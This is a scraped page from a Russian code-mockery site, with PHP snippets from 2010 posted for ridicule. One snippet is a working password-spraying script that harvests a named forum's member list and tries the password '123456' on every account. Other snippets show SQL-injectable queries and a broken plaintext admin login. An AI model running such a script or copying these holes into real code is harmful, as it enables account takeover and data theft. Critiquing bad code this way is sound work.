- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
$ix=$_POST['danue'];
if(isset($_POST['danue'])){
$reyd="INSERT INTO `NOVOSTI` (`CONNTEKT`) VALUES ('{$ix}')";
$rido=mysql_query($reyd) or die ("no dannuch");
header ('location: index.php');}-
PHP / Говнокод #4100
+160
SunnyMagadan,
25 Августа 2010
Комментарии (16) -
PHP / Говнокод #4097
+159
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
define(hostname, 'http://phpbbforum.ru'); $file = './txt/users_phpbb.txt'; function get_users($data) { preg_match_all('!">(.*?)</a></b>!', $data, $users); return $users[1]; } function get_num_users($data) { preg_match_all('!">(.*?)</a></b>!', $data, $users); return count($users[1]); } function get_num_pages($data) { preg_match('!">(\d{1,8})</a><form action!', $data, $num_pages); return $num_pages[1]; } function curl_header($url) { $ch = curl_init ($url); curl_setopt($ch, CURLOPT_USERAGENT, useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); $data = curl_exec($ch); curl_close($ch); return $data; } function brut($url) { $data = curl_header($url); $count = substr_count($data, 'Cookie'); if($count == 2) return false; else return true; } function get_pages($num) { global $users_per_page; for($i = 0; $i<$num; $i++) $data .= req(hostname . '/memberlist.php?mode=posts&order=DESC&start=' . $users_per_page * $i); return $data; } if(!file_exists($file)) { $data = req(hostname.'/memberlist.php'); $users_per_page = get_num_users($data); $num_pages = get_num_pages($data); $pages = get_pages($num_pages); $users = get_users($pages); $fp = fopen($file, 'w'); $users = implode("\n", $users); fputs($fp, $users); fclose($fp); } $users = file_get_contents($file); $users = explode("\n", $users); $count = count($users); $pass = '123456'; for($i = 0; $i<$count; $i++) { if( brut(hostname.'/login.php?username='.urlencode($users[$i])."&password=$pass") ) $good[] = $users[$i]; } $fp = fopen("./txt/$pass.txt", 'a+'); fputs($fp, implode("\n", $good)); fclose($fp); print_r($good);
Coder,
25 Августа 2010
Комментарии (5) -
PHP / Говнокод #4096
+172
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
<?php $strings = array(); $strings[] = "10_strings_0"; $strings[] = "10_strings_1x"; $strings[] = "10_strings_2"; $strings[] = "10_strings_3"; $strings[] = "10_strings_4x"; $strings[] = "10_strings_5x"; $strings[] = "10_strings_6"; $strings[] = "10_strings_7x"; $strings[] = "10_strings_8"; $strings[] = "10_strings_9"; // СПИСОК СТРОК ИЗ 100 СТРОК В КОТОРЫХ БУДЕТ ОСУЩЕСТВЛЯТЬСЯ ПОИСК СТРОК ИЗ СПИСКА $strings for ($counter=0; $counter<100; $counter++) { $check_strings[] = "10_strings_".$counter; } // Временная папка - папка со скриптом // создание vbs файлов for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) { $file = fopen($strings[$strings_c].'.vbs', 'w'); fwrite($file, 'Set Program = Wscript.CreateObject("Wscript.Shell")'.PHP_EOL.'Program.Run("'.$strings[$strings_c].'.bat'.'")'.PHP_EOL.'Wscript.Quit'); fclose($file); } // создание bat файлов $interpreter_root = 'C:\xampp\php\php.exe'; // путь к PHP интерпретатору for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) { $file = fopen($strings[$strings_c].'.bat', 'w'); fwrite($file, $interpreter_root.' '.$strings[$strings_c].'.php'); fclose($file); } // создание php файлов for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) { $code = '<?php $string = \''.$strings[$strings_c].'\'; // строка для проверки, в каждом экземпляре своя for ($counter=0; $counter<100; $counter++) { $check_strings[] = "10_strings_".$counter; } shuffle($check_strings); $ok = false; for ($check_strings_c=0; $check_strings_c<sizeof($check_strings); $check_strings_c++) { if ($string == $check_strings[$check_strings_c]) { $ok = true; break; } } if ($ok == true) { $file = fopen("'.$strings[$strings_c].'_ok.txt", "w"); fclose($file); } ?>'; $file = fopen($strings[$strings_c].'.php', 'w'); fwrite($file, $code);многопоточность на PHP
exciter,
25 Августа 2010
Комментарии (99) -
PHP / Говнокод #4095
+151
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
function pro($input) { $input=str_replace("\0", '_', $input); $input=trim($input); $input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\\'=>'\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~')); return $input; } function depro($input) { $input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\'=>'\\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~')); return $input; }во всяком случае аффтар считает что это действительно защита не в рот ибацца, anti sql inj.. это вам не это.
GoodTalkBot,
24 Августа 2010
Комментарии (76) -
PHP / Говнокод #4094
+160
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
if( isset( $_POST['username'] ) && $_POST['username'] != '' ) { $username = $_POST['username']; $password = $_POST['password']; $rs = mysql_query( "select * from admin" ); $row = mysql_fetch_array( $rs ) ; //echo "$username == $row[username] && $password == $row[password]"; if( $username == $row['username'] && $password == $row['password']) { session_register( 'ADMIN_NAME' ); $_SESSION['ADMIN_NAME'] = $row['name']; header( "Location: home.php" ); exit; } else $err = "Your Username and Password is invalid"; }Это же просто песня! К слову: сайт был написан румынскими кодерами чуть больше года назад.
Alecfyz,
24 Августа 2010
Комментарии (20) -
PHP / Говнокод #4091
+162
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
if ($is_home) { echo '<script> function chkcbfrm() { var el = $(\'#inppleasecallback\')[0]; if ((el.value == \'\') || (el.value == el.defaultValue)) { alert(\'Введите номер телефона...\'); return false; } else return true; } </script>'; echo '<form method="post" id="frmcallback" onsubmit="return chkcbfrm();">'; echo '<p>Введите пожалуйста телефон в формате +7-3812-XXXXXX</p>'; echo '<input type="text" class="textboxcontact" style="width: 220px" id="inppleasecallback" name="please_callback" value="Введите номер телефона" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;" />'; echo '<a href="#" class="butmore" onclick="if (chkcbfrm()) $(\'#frmcallback\').submit(); return false;">Перезвоните</a>'; echo '<form>'; } else { $ЕБАНУТЫЙ_ТЕКСТ = 'Введите пожалуйста телефон в формате +7-3812-XXXXXX (код страны - код города - номер), название организации, ФИО контактного лица и предмет интереса (XXX, XXX, металлопрокат, XXXXXX, крановое хозяйство)'; echo '<form method="post" id="frmcallback" onsubmit="if ($(\'#inppleasecallback\')[0].value == $(\'#inppleasecallback\')[0].defaultValue) { alert(\'Введите номер телефона...\'); return false; }">'; echo '<textarea class="textareacontact" style="width: 220px; height: 150px;" id="inppleasecallback" name="please_callback" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;">'.$ЕБАНУТЫЙ_ТЕКСТ.'</textarea>'; echo '<input class="submitcontact" type="submit" value="Перезвоните" />'; echo '<form>'; }по просьбе заказчика текст менялся 2-3 раза на дню, за что и получил такое название
shuchkin,
24 Августа 2010
Комментарии (41) -
PHP / Говнокод #4084
+158
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
<table border="1" class="new" bgcolor ="#F5F5F5"> <tr> <td><b>День</b></td> <td><b>До обеда</b></td> <td><b>После обеда</b></td> <?php while ($row = mysql_fetch_assoc($query)){ $date = $row['date']; $Id_date = convert($date); $date = substr ($date,8); //Проверка на повторность дня (один день-два события!) if ($count == $date){ $time = $row['time']; if ($time == 'До обеда'){ echo '<td>'; $judge = $row['judge']; $query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db); $row1 = mysql_fetch_assoc ($query1); $judge1 = $row1['desc']; //"Совещание" красным if ($judge1 == 'Совещание'){ echo "<td class='new_color'>$judge1</td>"; } else{ echo "<td>$judge1</td>";} echo "</td>"; } elseif ($time == 'После обеда'){ $judge = $row['judge']; $query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db); $row1 = mysql_fetch_assoc ($query1); $judge1 = $row1['desc']; if ($judge1 == 'Совещание'){ echo "<td class='new_color'>$judge1</td>"; } else{ echo "<td>$judge1</td>";} echo "</td>"; echo "</tr>"; } } // Блок для выполнения при отрицательной проверки на повторность дня else { $res1 = rus_days($Id_date); echo "<tr>"; echo "<td>$date $res1</td>"; $time = $row['time']; if ($time == 'До обеда'){ $judge = $row['judge']; $query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db); $row1 = mysql_fetch_assoc ($query1); $judge1 = $row1['desc']; if ($judge1 == 'Совещание'){ echo "<td class='new_color'>$judge1</td>"; } else{ echo "<td>$judge1</td>";} } elseif ($time == 'После обеда'){ echo "<td>"; $judge = $row['judge']; $query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db); $row1 = mysql_fetch_assoc ($query1); $judge1 = $row1['desc']; if ($judge1 == 'Совещание'){ echo "<td class='new_color'>$judge1</td>"; } else{ echo "<td>$judge1</td>";} echo "</td>"; echo "</tr>"; }Формирование таблицы. Данные тянутся из БД.
smitty,
24 Августа 2010
Комментарии (8) -
PHP / Говнокод #4083
+167
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
function suka($str){ $length = strlen($str); for($i=1; $i<=$length; $i++){ $b = (-1)*$i; $substrl .= substr($str, $b, 1); } echo $substrl; } $govno='jizni'; suka($govno);Попросил соискателя написать функцию, которая перевернет строку. Просто хотелось посмотреть подход к коду.
zorbis,
23 Августа 2010
Комментарии (49) -
PHP / Говнокод #4082
+160
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
<?php //Делаем массив $_verbose = array( "Вы не ввели слово которое хотите заменить!<br> <form name='zadacha' action='2.php' method='post'> <b>То что вставить:</b><br> <input size='25' maxlength='70' name='zamena'><br><br> <b>То что заменить:</b><br> <input size='25' maxlength='70' name='slovo'><br> <input type='submit' name='text' value='Изменить' style='background-color: #ffc66d; font-family: Tahoma Courier New; font: bolder 12px ;cursor: hand; height: 18px; color: #000; padding: 10px 20px 10px 20px'> </form>", "Вы не ввели слово которым будете изменять слово в документе!<br> <form name='zadacha' action='2.php' method='post'> <b>То что вставить:</b><br> <input size='25' maxlength='70' name='zamena'><br><br> <b>То что заменить:</b><br> <input size='25' maxlength='70' name='slovo'><br> <input type='submit' name='text' value='Изменить' style='background-color: #ffc66d; font-family: Tahoma Courier New; font: bolder 12px ;cursor: hand; height: 18px; color: #000; padding: 10px 20px 10px 20px'> </form>",); if(empty($_POST['slovo'])){ echo $_verbose[0]; exit; } if(empty($_POST['zamena'])){ echo $_verbose[1]; exit; } //Читаем файл из всех строчек в одну $text = file_get_contents("1.txt"); //Меняем введеное из первой формы на второе $text = str_replace($_POST['slovo'], $_POST['zamena'], $text); // удаляем html и php тэги $text = strip_tags($text); // заменяем двойной пробел на одиночный $text = str_replace(" ", " ", $text); //удаляем пробелы с конца и начала $text = trim($text); //w - перезапись, a - дозапись $flag_rc = "w"; //Открываем файл с параметром $flag_rc $rc_file = fopen("1.txt", $flag_rc); // применяем функцию блокировки файла с флагом записи flock($rc_file, LOCK_EX); // записываем в файл данные fputs($rc_file, "$text"); // снимаем блокировку flock($rc_file, LOCK_UN); // закрываем дескриптор указывающий на файл fclose($rc_file); // Показываем результат и выходим echo $text; exit; ######################################################### #А вот строчка которую надо куда то пихнуть для проверки# # #//Проверяем вписаны ли слова в свои формы # #if(empty($_slovo)){ # #echo $_verbose[0]; # #exit; # ######################################################### #if(empty($_zamena)){ # #echo $_verbose[1]; # #exit; # ######################################################### ?>Этот говнокод - содержимое http://upwap.ru/993821 (первая ссылка, данная в ответ в копипасте ниже).
Мобильный форум Wap-разработчиков хостинга kmx.ru
Форум
Тема: Куда пихнуть этот кусок пхп?
Nelix 16.08.10 16:18
Вобщем вот ссылка на этот скрипт в архиве: http://lastbastion.kmx.ru/Zamena.rar //// Этот скрипт меняет одно слово на другое в тхт доке, можете протестить, всё работает... Я решил сделать фильтр там, на то что бы если в форме нет ничего то выводилась ошиб
Nelix 16.08.10 16:20
..ошибка и естественно выход, парметр emty , в архиве в коде его там найдете в комментах, и куда их пихнуть не знаю... либо ошибка выходит, либо не работает.. вчера написал в 3 раза больше код с ЭТИМИ же самыми проверками на запись в форме а седня не могу
Nelix 16.08.10 16:22
Посмотрите плиииззз и скажите что я не правильно делал там... весь день сижу над этой фигней:( гг
stallon 16.08.10 17:41
http://upwap.ru/993821 пароль kmx . С тебя пиво
Nelix 16.08.10 18:12
Работает))) Сочтемся как-нибудь) .пиво. а чем отличаются скобки квадратные от загнутых? Ну я имею ввиду не формой а в коде php, разница между ними есть какие надо использовать?
Nelix 16.08.10 18:17
Ая сча подумал и ещё вот так сделал: http://upwap.ru/993861 пароль kmx есть разница какая то в наших кодах? Работает одинаково совершенно...хм.. минусы плюсы? Если не сложно..
stallon 16.08.10 18:40
в фигурные скобки заключается условие какое-либо. в квадратные. много что
stallon 16.08.10 18:53
почитай о такой директиве как register_globals. мой код для рег_глобалс off, твой для рег_глобалс on. что нежелательно
Nelix 17.08.10 15:27
Почитал:) Но ничего не понял:( гг
7ion,
23 Августа 2010
Комментарии (13) -
PHP / Говнокод #4081
+160
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
if($usershow != 0) { $site->AddBlock('topnav', true, true, 'tn'); $var['nav'] = ''; $site->AddSubBlock('topnav', true, $var); } else { $site->AddBlock('topnav', true, true, 'tn'); $var['nav'] = $top_nav; $site->AddSubBlock('topnav', true, $var); }
Мартин,
23 Августа 2010
Комментарии (4)
Follow us!